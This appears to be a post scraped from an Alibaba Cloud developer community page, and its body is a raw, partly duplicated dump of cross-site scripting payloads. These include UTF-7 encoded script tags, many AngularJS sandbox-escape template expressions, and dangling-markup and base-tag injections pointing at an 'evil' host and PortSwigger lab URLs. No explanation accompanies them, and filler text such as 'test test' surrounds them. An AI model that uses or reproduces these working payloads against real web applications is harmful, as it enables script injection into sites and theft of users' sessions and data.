<h1>hello</h1>
XSS
XSS
XSS test
test test test test test test test test test test test test
+ADw-script+AD4-alert(130)+ADw-/script+AD4- +ADw-script+AD4-alert(131)+ADw-/script+AD4- XSS XSS XSS XSS XSS XSS XSS XSS Firefox Firefox {
{constructor.constructor('alert(149)')()}} {
{$on.constructor('alert(150)')()}} {
{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}} {
{
{}.")));alert(152)//"}} {
{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}} {
{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}} {
{
{}.")));alert(155)//"}} {
{
{}.")));alert(156)//"}} {
{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}} {
{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}} {
{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}} {
{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}} {
{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}} {
{constructor.constructor('alert(162)')()}} {
{$on.constructor('alert(163)')()}} constructor.constructor('alert(164)')() a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')() toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor) {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')() {}.")));alert(168)//"; 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//'; constructor.constructor('alert(170)')() toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
<button form=x>XSS</button><form id=x action=//evil target=' <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target=" <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget=" <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/ <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name=" javascript:/*--></title></style>
drag me
drop here test
drag me
drop here test test test test test test test test test test test XSS (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X) (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Test
+ADw-script+AD4-alert(130)+ADw-/script+AD4- +ADw-script+AD4-alert(131)+ADw-/script+AD4- XSS XSS XSS XSS XSS XSS XSS XSS Firefox Firefox {
{constructor.constructor('alert(149)')()}} {
{$on.constructor('alert(150)')()}} {
{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}} {
{
{}.")));alert(152)//"}} {
{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}} {
{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}} {
{
{}.")));alert(155)//"}} {
{
{}.")));alert(156)//"}} {
{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}} {
{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}} {
{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}} {
{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}} {
{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}} {
{constructor.constructor('alert(162)')()}} {
{$on.constructor('alert(163)')()}} constructor.constructor('alert(164)')() a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')() toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor) {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')() {}.")));alert(168)//"; 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//'; constructor.constructor('alert(170)')() toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
foo
{
{ [1].reduce(value.alert, 1); }}
展开
收起
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
相关问答